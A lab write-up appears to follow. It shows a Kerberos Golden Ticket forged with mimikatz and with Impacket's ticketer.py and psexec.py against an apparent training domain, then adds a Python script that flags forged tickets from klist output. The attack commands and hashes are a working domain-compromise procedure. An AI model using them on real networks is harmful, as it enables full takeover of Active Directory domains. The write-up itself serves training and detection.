Kerberos Attacks - Golden Ticket

From Windows:

mimikatz # kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-2974783224-3764228556-2640795941 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt
User : Administrator
Domain : inlanefreight.local (INLANEFREIGHT)
SID : S-1-5-21-2974783224-3764228556-2640795941
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: c0231bd8a4a4de92fca0760c0ba9e7a6 - rc4_hmac_nt
Lifetime : 12/28/2023 10:32:23 AM ; 12/25/2033 10:32:23 AM ; 12/25/2033 10:32:23 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for ‘Administrator @ inlanefreight.local’ successfully submitted for current session

PS C:\tools> klist

Current LogonId is 0:0x83356

Cached Tickets: (1)

#0> Client: Administrator @ inlanefreight.local
Server: krbtgt/inlanefreight.local @ inlanefreight.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 12/28/2023 10:32:23 (local)
End Time: 12/25/2033 10:32:23 (local)
Renew Time: 12/25/2033 10:32:23 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
PS C:\tools> Enter-PSSession dc01
Enter-PSSession : Connecting to remote server dc01 failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.
At line:1 char:1
+ Enter-PSSession dc01
    + CategoryInfo          : InvalidArgument: (dc01:String) [Enter-PSSession], PSRemotingTransportException
    + FullyQualifiedErrorId : CreateRemoteRunspaceFailed

PS C:\tools> klist

Current LogonId is 0:0x83356

Cached Tickets: (3)

#0> Client: Administrator @ inlanefreight.local
Server: krbtgt/INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 12/28/2023 10:33:07 (local)
End Time: 12/28/2023 20:33:07 (local)
Renew Time: 1/4/2024 10:33:07 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x2 -> DELEGATION
Kdc Called: DC01.INLANEFREIGHT.LOCAL

#1> Client: Administrator @ inlanefreight.local
Server: krbtgt/inlanefreight.local @ inlanefreight.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 12/28/2023 10:32:23 (local)
End Time: 12/25/2033 10:32:23 (local)
Renew Time: 12/25/2033 10:32:23 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

#2> Client: Administrator @ inlanefreight.local
Server: HTTP/dc01 @ INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 12/28/2023 10:33:07 (local)
End Time: 12/28/2023 20:33:07 (local)
Renew Time: 1/4/2024 10:33:07 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DC01.INLANEFREIGHT.LOCAL

From Linux:

└─# ticketer.py -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-2974783224-3764228556-2640795941 -domain inlanefreight.local -user-id 500 Administrator
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for inlanefreight.local/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in Administrator.ccache

┌──(root💀kali)-[~]
└─# export KRB5CCNAME=./Administrator.ccache

┌──(root💀kali)-[~]
└─# psexec.py -k -no-pass dc01.inlanefreight.local
Impacket v0.11.0 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

Which a Google search points to here:

Question: is anyone able to solve this or should Support provide the AES256 key for the KRBTGT account so that we can solve the lab?

Forget everything… I was able to retrieve the krbtgt aes256 key using dcsync from a previous task, but after I noticed it failed with the AES256 key as well, I kept investigating and I realized I was using the wrong Domain SID…
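The klist dumps above show, side by side, what makes an injected ticket stand out to a defender: the forged TGT is RC4-encrypted, has a ten-year lifetime and renewal window, and was never issued by any KDC ("Kdc Called:" is empty), while the tickets the DC actually issued are AES-256 with the default 10-hour lifetime and 7-day renewal. The following is an added example, not part of the post or of mimikatz/Impacket: a small Python audit that parses klist-style output and flags entries that violate those policy defaults. The policy limits and the "no KDC contacted" heuristic are assumptions (the real limits should be read from the domain's Kerberos policy GPO); the sample input reuses the ticket values quoted in the post.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

TIME_FMT = "%m/%d/%Y %H:%M:%S"
# Assumed policy limits: AD defaults are 10 h TGT lifetime and 7 d renewal.
# Replace with the values from the domain's Kerberos policy when auditing for real.
MAX_TGT_LIFETIME = timedelta(hours=10)
MAX_RENEWAL = timedelta(days=7)

# Sample klist output, using the ticket values quoted in the post above.
SAMPLE_KLIST = """Cached Tickets: (2)

#0> Client: Administrator @ inlanefreight.local
Server: krbtgt/inlanefreight.local @ inlanefreight.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 12/28/2023 10:32:23 (local)
End Time: 12/25/2033 10:32:23 (local)
Renew Time: 12/25/2033 10:32:23 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

#1> Client: Administrator @ inlanefreight.local
Server: krbtgt/INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 12/28/2023 10:33:07 (local)
End Time: 12/28/2023 20:33:07 (local)
Renew Time: 1/4/2024 10:33:07 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x2 -> DELEGATION
Kdc Called: DC01.INLANEFREIGHT.LOCAL
"""


@dataclass
class Ticket:
    index: int
    client: str
    server: str
    enc_type: str
    start: datetime
    end: datetime
    renew: datetime
    kdc_called: str


def _field(body: str, label: str) -> str:
    """Return the value following 'label:' in one klist entry ('' if absent/empty)."""
    m = re.search(rf"^\s*{re.escape(label)}:\s*(.*)$", body, re.M)
    return m.group(1).strip() if m else ""


def _time(value: str) -> datetime:
    # klist prints e.g. '12/28/2023 10:32:23 (local)'; drop the timezone suffix.
    return datetime.strptime(value.split(" (")[0], TIME_FMT)


def parse_klist(text: str) -> List[Ticket]:
    """Split a klist dump into entries ('#N> ...') and parse each one."""
    tickets = []
    for m in re.finditer(r"#(\d+)>(.*?)(?=\n#\d+>|\Z)", text, re.S):
        body = m.group(2)
        tickets.append(Ticket(
            index=int(m.group(1)),
            client=_field(body, "Client"),
            server=_field(body, "Server"),
            enc_type=_field(body, "KerbTicket Encryption Type"),
            start=_time(_field(body, "Start Time")),
            end=_time(_field(body, "End Time")),
            renew=_time(_field(body, "Renew Time")),
            kdc_called=_field(body, "Kdc Called"),
        ))
    return tickets


def audit(tickets: List[Ticket]) -> Dict[int, List[str]]:
    """Map ticket index -> list of policy violations; clean tickets are omitted."""
    findings: Dict[int, List[str]] = {}
    for t in tickets:
        reasons = []
        if t.end - t.start > MAX_TGT_LIFETIME:
            reasons.append(f"lifetime {t.end - t.start} exceeds {MAX_TGT_LIFETIME}")
        if t.renew - t.start > MAX_RENEWAL:
            reasons.append(f"renewal window {t.renew - t.start} exceeds {MAX_RENEWAL}")
        if "RC4" in t.enc_type.upper():
            reasons.append("RC4-encrypted ticket in an AES-capable domain")
        if t.server.lower().startswith("krbtgt/") and not t.kdc_called:
            reasons.append("TGT cached without any KDC being contacted (injected?)")
        if reasons:
            findings[t.index] = reasons
    return findings


if __name__ == "__main__":
    for idx, reasons in audit(parse_klist(SAMPLE_KLIST)).items():
        print(f"ticket #{idx}:")
        for r in reasons:
            print(f"  - {r}")
```

Run against the sample, only ticket #0 (the forged TGT) is reported, on all four counts; the DC-issued AES ticket sits exactly at the default limits and passes. The same checks translate directly to Event ID 4769/4624 data on the domain controllers, where a ticket lifetime far beyond policy or a TGS request for a TGT the KDC never issued is the usual golden-ticket indicator.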